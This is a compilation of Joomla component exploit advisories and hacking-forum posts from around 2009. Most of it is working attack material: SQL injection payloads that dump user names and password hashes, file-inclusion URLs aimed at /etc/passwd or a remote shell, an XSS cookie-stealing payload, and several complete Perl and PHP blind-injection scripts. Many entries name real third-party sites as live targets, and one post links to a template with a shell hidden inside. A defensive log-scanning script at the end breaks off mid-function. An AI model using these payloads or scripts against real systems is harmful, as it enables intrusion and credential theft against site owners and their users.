http://site.com/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00
Vuln file: Cache.php
Vuln Code:
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
Exploit:
http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
Vuln file: Clickheat_Heatmap.php
Vuln Code:
require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
Exploit:
http://site.com/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
Vuln file: GlobalVariables.php
Vuln Code:
require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php');
Exploit:
http://site.com/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00
Well, that's about it...)
Joomla Component ArtForms 2.1 b7 Remote File Inclusion Vulnerabilities
ArtForms 2.1b7 remote file includes
From Turkey
iskorpitx (a world brand that can never be imitated)
// swfmovie.php - swf output and config
/* output captcha image */
/* output captcha mp3 */
----------------------------------------------------------------------------------
[path]/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=*shell
[path]/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=*shell
[path]/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=*shell
-----------------------------------------------------------------------------------
by iskorpitx
admin@mavi1.org
# milw0rm.com [2009-05-15]
Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection
================================================== ================================
Joomla Component com_juser (id) SQL injection Vulnerability
================================================== ================================
################################################## #
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine ;)
[+] Email : chipdebios[alt+64]gmail.com
################################################## #
http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code]
------
SQL code:
+and+1=2+union+select+1,2,concat(username,0x3a,pas sword)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_ users--
-----
http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3 a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from +jos_users--
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
<creationDate>25.05.2007</creationDate>
<author>Joomlaequipment</author>
<copyright>Joomlaequipment"©2007</copyright>
<license>Comercial</license>
<authorEmail>support@joomlaequipment.com</authorEmail>
<authorUrl>http://joomlaequipment.com</authorUrl>
<version>2.0.4</version>
<description>Registration Manager</description>
# milw0rm.com [2009-06-01]
Joomla Component com_vehiclemanager 1.0 RFI Vulnerability
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Joomla com_vehiclemanager 1.0 Remote File Include
Download: http://ordasoft.com/Download-document/1-Vehicle-Manager-Basic.html
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Found: xoron
contact: xorontr@gmail.com (only e-mail)
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Exploit:
-> ... /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=shell?
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
Thanx: str0ke, VoLkan
=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=
# milw0rm.com [2009-06-09]
Joomla Component com_jumi (fileid) Blind SQL Injection Exploit
------------------------------------------------------------------------------
Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability
------------------------------------------------------------------------------
################################################## ###
# [+] Author : Chip D3 Bi0s #
# [+] Email : chipdebios[alt+64]gmail.com #
# [+] Vulnerability : Blind SQL injection #
################################################## ###
Example:
http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code>
n=number fileid valid
<Sql code>:
'+and+(select+substring(concat(1,password),1,1)+fr om+jos_users+limit+0,1)=1/* '+and+(select+substring(concat(1,username),1,1)+fr om+jos_users+limit+0,1)=1/* /index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username) ,1,1)+from+jos_users+limit+0,1)=1/*
etc, etc...
DEMO LIVE:
http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(usern ame,0x3a,password)+from+jos_users+limit+0,1),1,1)) =101/*
etc, etc....
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
if you want to save the work, you can use the following script
-------------------------------
#!/usr/bin/perl -w use LWP::UserAgent; print "\t\t-------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection \n\n"; print "\t\t-----------------------------------------------------------------\n\n"; print "http://wwww.host.org/Path: "; chomp(my $target=<STDIN>); print " [-] Introduce fileid: "; chomp($z=<STDIN>); print " [+] Password: "; $column_name="concat(password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter { #c referido a ascci 48-57, 97-102 for ($c=48;$c<=57;$c++) { $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = "com_"; # print "limit:"; # print "$x"; # print "; assci:"; # print "$c;"; if ($content =~ /$regexp/) {$char=chr($c); print "$char";} } for ($c=97;$c<=102;$c++) { $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = "com_"; # print "limit:"; # print "$x"; # print "; assci:"; # print "$c;"; if ($content =~ /$regexp/) {$char=chr($c); print "$char";} } }
# milw0rm.com [2009-06-15]
Joomla Component com_ijoomla_rss Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " oooooooooooooooooooooooooooooooooooooooooooooooooo ooooooooooooooooooooo\n"; print " o Joomla Component com_ijoomla_rss Blind SQL Injection Exploit o\n"; print " o Author:xoron o\n"; print " o More info:http://joomla15.ijoomlademo.com o\n"; print " o vendor:http://ijoomlademo.com o\n"; print " o Dork : com_ijoomla_rss o\n"; print " o Usage: perl bachir.pl host path <options> o\n"; print " o Example: perl bachir.pl www.host.com /joomla/ -s 2 o\n"; print " oooooooooooooooooooooooooooooooooooooooooooooooooo ooooooooooooooooooooo\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $sid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "s=i"); print "[~] Exploiting...\n"; if($options{"u"}) { $userid = $options{"u"}; } if($options{"s"}) { $sid = $options{"s"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $sid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $sid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $sid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=com_ijoomla_rss&act=xml&cat=".$sid." and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")"; my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "seminar_boxA"; if($content =~ /$regexp/) { return 1; } else { return 0; } }
# milw0rm.com [2009-06-15]
Joomla Component com_tickets <= 2.1 (id) SQL Injection Vuln
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++
Joomla Component com_tickets (id) SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++
################################################## #
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt
[+] Vulnerability : SQL injection
################################################## #
Info component:
---------------
Name : Tickets
Version : 0.1 & 2.1
Author : Paul Coogan
Author email : paul@ideabuzz.com
Web author : http://www.ideabuzz.com
################################################## #
Example: http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code]
n = id valid
Demo Live Joomla : version 2.1
------------------------------
http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(usernam e,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+ from+jos_users/*
Demo Live Mambo : Version 0.1
-----------------------------
http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(userna me,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22+from+mos_users/*
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
# milw0rm.com [2009-06-22]
com_svmap
Stumbled on this by accident. Maybe someone will finish it off, if, of course, there is anything to finish.
www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2
--StraNger--
30.06.2009, 17:52
com_svmap
Stumbled on this by accident. Maybe someone will finish it off, if, of course, there is anything to finish.
www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2
If I'm not mistaken this isn't a hole,
just an error in data handling
shell_c0de
08.07.2009, 15:50
SQL injection in the doQment component for Joomla
Vulnerability : vulnerable parameter cid=
Example:
http://www.agmodena.it/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users/**/where/**/usertype=CHAR(83,117,112,101,114,32,65,100,109,105 ,110,105,115,116,114,97,116,111,114)#&Itemid=92
Dork: inurl:com_doqment + cid=
# shell_c0de
InDuStRieS
28.07.2009, 17:48
Joomla Almond Classifieds Component SQL Injection and Cross-Site Scripting
Description:
Moudi has reported some vulnerabilities in the Almond Classifieds component for Joomla, which can be exploited by malicious people to conduct SQL injection and cross-site scripting attacks.
1) Input passed via the "replid" to index.php (when "option" is set to "com_aclassf", "Itemid" is set to a valid id, "ct" to "manw_repl" and "md" is set to "add_form") is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "addr" parameter to components/com_aclassf/gmap.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerabilities are reported in version 7.5. Other versions may also be affected.
################################################## #########################
#-----------------------------I AM MUSLIM !!------------------------------#
################################################## #########################
================================================== ============================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ /___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
================================================== ============================
[+] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
================================================== ============================
[+] Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities
================================================== ============================
[+] Script: [ Joomla Almond Classifieds v.7.5 ]
[+] Language: [ PHP ]
[+] Download: [ http://www.almondsoft.com ]
[+] Founder: [ Moudi <m0udi@9.cn> ]
[+] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[+] Team: [ EvilWay ]
[+] Dork: [ OFF ]
[+] Price: [ $195 ]
[+] Site : [ https://security-shell.ws/forum.php ]
################################################## #########################
===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===
[+] http://www.site.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]
[+] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=1 <= TRUE
[+] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=2 <= FALSE
[+] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> TRUE
[+] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> FALSE
===[ Exploit XSS + LIVE : vulnerability ]===
[+] http://www.site.com/patch/components/com_aclassf/gmap.php?addr=[XSS]
[+] http://www.almondsoft.com/j/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>
Author: Moudi
################################################## #########################
Joomla component com_fireboard SQL-inj
Vulnerable parameter func
?func=who',%20userid=123,%20link=(SELECT %20jos_users.password%20FROM%20jos_users%20WHERE%2 0jos_users.id=123)%20--%20a
More details here
http://forum.antichat.ru/threadnav130926-1-10.html
and here
http://forum.antichat.ru/showpost.php?p=1409117&postcount=33
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++
Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++
################################################## #
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : Blind SQL injection
################################################## #
Example:
http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code] n:valid Itemid
Sql code:
+and+(select+substring(concat(1,password),1,1)+fro m+jos_users+limit+0,1)=1/*
etc, etc...
DEMO LIVE:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username) ,1,1)+from+jos_users+limit+0,1)=1
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(passw ord,0x3a,username)+from+jos_users+limit+0,1),1,1)) =97 !False ¡¡¡¡
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(passw ord,0x3a,username)+from+jos_users+limit+0,1),1,1)) =98 ¡True ¡¡¡¡
etc, etc...
# milw0rm.com [2009-08-01]
http://wwww.host.org/Path : http://www.cd7.com.ec/
[-] Introduce Itemid : 66
[-] Introduce coincidencia : http://www.cd7.com.ec/forum/
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
#!/usr/bin/perl -w use LWP::UserAgent; use Benchmark; my $t1 = new Benchmark; print "\t\t-------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t Joomla Component com_jfusion (Itemid) Blind SQL-injection \n\n"; print "\t\t-------------------------------------------------------------\n\n"; print "http://wwww.host.org/Path : ";chomp(my $target=<STDIN>); print " [-] Introduce Itemid : ";chomp($z=<STDIN>); print " [-] Introduce coincidencia : ";chomp($w=<STDIN>); $column_name="concat(password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); print "----------------Inyectando----------------\n"; #es Vulnerable? $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=1"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=2"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";} else {print " [-] Vulnerable :)\n"; for ($x=1;$x<=32;$x++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))>57"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}#para alininear 0..9 con los 10-32 if ($content =~ /$regexp/) { for ($c=97;$c<=102;$c++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." 
"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;} } } else { for ($c=48;$c<=57;$c++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." "; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;} } } } print " [+] Password :"." ".join('', @caracter) . "\n"; my $t2 = new Benchmark; my $tt = timediff($t2, $t1); print "El script tomo:",timestr($tt),"\n"; } } else {print " [-] Exploit Fallo :(\n";}
# milw0rm.com [2009-08-01]
Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit
<?php
/*
--------------------------
Joomla <=1.0.15 Component com_pms <=2.0.4 (Ignore-List) SQl-Injection Vuln
--------------------------
Author: M4dhead
Vulnerable joomla component : com_pms
Conditions : magic_quotes_gpc = On or Off it doesn't matter ;)
--------------------------
PREPARATION:
--------------------------
You need a valid Account on the Joomla 1.0.15 Site + Community Builder Suite 1.1.0:
Community Builder Suite 1.1.0:
http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,1175.html
PMS enhanced Version 2.0.4 J 1.0
http://www.make-website.de/script-downlaods?task=summary&cid=123&catid=214
Install Joomla 1.0.15
Install Community Builder
Install PMS Enhanced
Activate the Ignorlist in Components->PMS Enhanced->Config
Tab: Backend -> Ignorlist: Yes
Create a valid User on the target Joomla 1.0.15 System with Community Builder,
login and copy the cookieinformation into the $cookie var below,
adjust the User-Agent on your Post Header dependent on your Browser.
Notice: Pay attention to your User-Agent in the POST header; it has to be the same as the one you logged in with,
because the cookie-name is dependent on your browser.
--------------------------
USAGE:
--------------------------
Run this script! If no page prompting you to log in is shown, the attack was successful.
Then go to the ignore list: www.yourtargetsite.com/index.php?option=com_pms&Itemid=&page=ignore
and you will see some username and passwords in the selectbox :-)
Have fun!!
----------------------------------------------------
*/
$host = "localhost"; //your target Joomla Site
$cookie = "290cd01070fed63ac53f84f5c91d2bd9=a5846a8c64962e143 67d5c7298f6c72c"; //replace this with your own cookie values
$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\r\n";
//NOTICE: Pay attention to your User-Agent in the POST header; it has to be the same as the one you logged in with,
//because the cookie-name is dependent on your browser.
//Don't change anything below
$path = "/joomla/index.php?option=com_pms&Itemid=&page=ignore"; //dont change this
$data_to_send = "no_entry=keine+Eintr%E4ge&save=Ignorliste+speichern&filter_site_users=alle&ignore_ids=|63, 111 ) AND 1=2 UNION SELECT 1,concat(username,char(0x3a), password),3 from jos_users -- /* |"; //you don't have to change this
print_r($post = PostToHost($host, $path, $cookie, $data_to_send, $useragent));
function PostToHost($host, $path, $cookie, $data_to_send, $useragent) {
$fp = fsockopen($host, 80);
fputs($fp, "POST $path HTTP/1.1\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "User-Agent: $useragent");
fputs($fp, "Cookie: $cookie\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ". strlen($data_to_send) ."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data_to_send);
while(!feof($fp)) {
$res .= fgets($fp, 128);
}
fclose($fp);
return $res;
}
?>
# milw0rm.com [2009-08-07]
COM_SOBI2
SQL INJECTION
http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.ht ml
Tested only on Joomla_1.0.x
index.php?option=com_sobi2&sobi2Task=search&Itemid=26
benchmark
enter ')and+benchmark(10000000,benchmark(10000000,md5(no w())))# into the search field, being sure to remove all spaces,
and hit search)
Ded MustD!e
10.09.2009, 04:10
Vulnerability: SQL-Inj
Component: The Publications
Vulnerability in file publications.php
Vulnerable code:
$query = "SELECT * FROM #__content WHERE catid=$id ORDER BY title DESC";
Example:
http://www.bscic.gov.bd/index.php?option=com_publications&Itemid=20&lang=en&id=6/**/and/**/1=0/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9, 10,11,12,13,14+from+jos_users--
SQL injection exploits in Joomla components
The computer security website PacketStorm has published seven exploits at once demonstrating SQL injection in add-on components of the popular Joomla content management system. The exploits concern the following components: com_speech, com_pressrelease, com_mediaalert, com_joomloc, com_lucygames, com_tpdugg and com_bfsurvey_profree.
Joomla Speech (exploit) (http://packetstormsecurity.org/0909-exploits/joomlaspeech-sql.txt)
Joomla Press Release (exploit) (http://packetstormsecurity.org/0909-exploits/joomlapr-sql.txt)
Joomla Media Alert (exploit) (http://packetstormsecurity.org/0909-exploits/joomlamediaalert-sql.txt)
Joomla Joomloc (exploit) (http://packetstormsecurity.org/0909-exploits/joomlajoomloc-sql.txt)
Joomla LucyGames (exploit) (http://packetstormsecurity.org/0909-exploits/joomlalucygames-sql.txt)
Joomla TPDugg (exploit) (http://packetstormsecurity.org/0909-exploits/joomlatpdugg-sql.txt)
Joomla BF Survey Pro Free (exploit) (http://packetstormsecurity.org/0909-exploits/joomlabfsurvey-sql.txt)
Ded MustD!e
11.09.2009, 20:53
Vulnerability: SQL-Inj
Component: Jeporter
Version: 2.0
Vulnerability in file jeporter.php
Vulnerable code:
$cid = mosGetParam( $_REQUEST, 'cid', false);
$sql = "SELECT * FROM #__jeporter WHERE id= ".$cid;
$database->setQuery( $sql );
$report = NULL;
$database->loadObject( $report );
$cid = $report->id;
$title = $report->title;
$jquery = $report->jquery;
$sql = "SELECT * FROM #__jeporter_fields WHERE jeportid= ".$cid;
$database->setQuery( $sql);
$rows = $database->loadObjectList();
Example:
http://www.nationalaidsstrategy.org/index.php?option=com_jeporter&task=showreport&cid=-4+union+select+1,concat_ws(0x3a,username,password) ,3,4,5+from+jos_users--
Might come in handy for someone... A template with a shell inside..
after installing the template the shell will be at http://site.name/templates/jd_lagoon/ads.php
http://depositfiles.com/files/lhtkdh0m1
Ded MustD!e
13.09.2009, 01:56
Vulnerability: Blind SQL-Inj
Component: com_clan_members
Version: 0.9.2.2b
Vulnerability in file clan_members.html.php
Vulnerable code:
$database->setQuery("SELECT * FROM #__clan_members WHERE id = $id" );
$member = $database -> loadAssocList();
$database->setQuery("SELECT * FROM #__users WHERE id = $id AND block = '0'" );
$usersdata = $database -> loadAssocList();
$database->setQuery("SELECT * FROM #__clan_members_squadperuser WHERE uid=$id" );
$rowsquadperuser = $database -> loadObjectList();
$database->setQuery("SELECT * FROM #__clan_members_comment WHERE memberid=$id" );
$rowmembercomment = $database -> loadObjectList();
$database->setQuery("SELECT * FROM #__clan_members_fields WHERE published=1 ORDER BY ordering" );
$rowmemberfields = $database -> loadObjectList();
#Check if the user is logged in into the side
$database->setQuery("SELECT count(distinct(userid)) as user_online FROM #__session WHERE guest=0 AND userid = $id");
$online = $database->loadResult();
foreach($rowsquadperuser as $squadperuser)
{
$database->setQuery("SELECT * FROM #__clan_members_squad WHERE published = '1' AND id = '$squadperuser->sid'" );
$squadname = $database -> loadAssocList();
if($squadname[0]["squadpicture"] != '' || $squadname[0]["squadname"] != '')
{
$squadpicture_array[$i+1] = $squadname[0]["squadpicture"];
if($i == 0) $squadnames .= $squadname[0]["squadname"]; else $squadnames .= ",".$squadname[0]["squadname"];
$i++;
}
}
Example:
true -> http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=5&task=showClanMemberDetails
false -> http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=4&task=showClanMemberDetails
Ded MustD!e
14.09.2009, 15:15
Vulnerability: RFI
Component: UH_Events
Version: 0.99.0RC3a
Vulnerability in file admin.uhevents.php
Requirements: register_globals & allow_url_fopen = On
Vulnerable code:
require_once( $mosConfig_absolute_path."/administrator/components/$option/uhevents_config.php");
Exploit: .../components/uh_events/admin.uhevents.php?mosConfig_absolute_path=http://shell?
Vulnerability: SQL
Component: Projects
Stumbled on this by accident)
?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Vers ion(),Database(),User()),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
Example:
http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Vers ion(),Database(),User()),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
Same site:
Vulnerability: SQL
Component: com_nodes
?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal
http://www.inab.org/index.php?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal
Vulnerability scanner for Joomla
http://sourceforge.net/projects/joomscan/
Vulnerability: SQL-Inj
Component: DJ Catalog
Version: 1.0.4
Requirements: magic_quotes_gpc = off
File: /components/com_djcatalog/models/show.php
function getAllElements(){
global $mainframe;
$par =& $mainframe->getParams('com_djcatalog');
$limit = $par->get('limit_items_show');
$limitstart = JRequest::getVar('limitstart', 0, '', 'int');
$producer_id = JRequest::getVar('pid', 0, '', 'int');
$search = '';
if(JRequest::getVar('search','0','string')!='0'){
$search = " AND name LIKE '%".JRequest::getVar('search','0','string')."%' ";
}
$producer = '';
if($producer_id){
$producer = ' AND producer_id LIKE '.$producer_id. '';
}
$order = JRequest::getVar('order');
$db= &JFactory::getDBO();
switch ($order) { ... }
$query = "SELECT * FROM #__djcat_items WHERE 1 ".$producer.$search.$orderQuery;
$db->setQuery($query);
$Arows = $this->_getList($query, $limitstart, $limit);
return $Arows;
}
Exploit:
/index.php?option=com_djcatalog&view=show&search='+and+0+union+select+1,2,3,username,5,passw ord,7,8,9,10,11+from+%23__users%23
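Almost every entry in this thread, DJ Catalog included, comes down to one of a few request shapes: a union select column list in a numeric or string parameter, a blind and substring(...)= or benchmark( probe, an include-path parameter such as mosConfig_absolute_path pointed at a traversal sequence or a remote URL with a trailing %00, "><script> in a parameter the component echoes back, and a scalar parameter rewritten as param[]= so the component trips over the array and discloses its path in a PHP notice. Someone reviewing a site's access logs can flag all of those with one small classifier. The block below is an added example written for this thread, not code from any of the advisories above or from the Joomla project; the log lines, client addresses and hostnames are constructed, and the pattern list is a starting point for log review, not a complete WAF rule set.

```python
"""Flag Joomla-style injection, include and path-disclosure probes in access-log lines.

Added example for this thread (not from any advisory above, not Joomla code).
All log lines, addresses and hostnames below are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# One Apache "combined" log line; only the fields this check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]*)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Request shapes that recur across the advisories quoted in this thread.
SQLI_UNION = re.compile(r'\bunion\b(?:\s+all)?\s+select\b', re.I)
SQLI_BLIND = re.compile(
    r'\b(?:substring|substr|mid|ascii|benchmark|sleep)\s*\('
    r'|\band\s+\d+\s*=\s*\d+\b',
    re.I,
)
XSS = re.compile(r'<\s*script\b|\bon(?:click|load|error|focus|mouseover)\s*=|javascript:', re.I)
TRAVERSAL = re.compile(r'(?:\.\./){2,}')
INCLUDE_PARAM = re.compile(r'mosConfig_absolute_path', re.I)   # used as an include() prefix


def normalize(raw_query: str) -> str:
    """Decode %xx and '+', turn MySQL /**/ comments back into spaces, collapse whitespace."""
    decoded = unquote_plus(raw_query).replace('/**/', ' ')
    return re.sub(r'\s+', ' ', decoded)


def classify_request(path: str) -> set:
    """Return the set of pattern labels matching the query string of one request path."""
    labels = set()
    query = urlsplit(path).query
    text = normalize(query)
    if SQLI_UNION.search(text):
        labels.add('sqli_union')
    if SQLI_BLIND.search(text):
        labels.add('sqli_blind')
    if XSS.search(text):
        labels.add('xss')
    if '\x00' in text:                 # %00 cuts off the file name appended after the prefix
        labels.add('null_byte')
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.endswith('[]'):        # scalar turned into an array: path-disclosing notice
            labels.add('array_param')
        if INCLUDE_PARAM.search(name):
            lowered = value.lower()
            if lowered.startswith(('http://', 'https://', 'ftp://')) or TRAVERSAL.search(lowered):
                labels.add('file_include')
    return labels


def scan_log(lines) -> list:
    """Return one record per flagged request: client IP, status, path and sorted labels."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue                   # malformed line: skip it rather than abort the scan
        labels = classify_request(match.group('path'))
        if labels:
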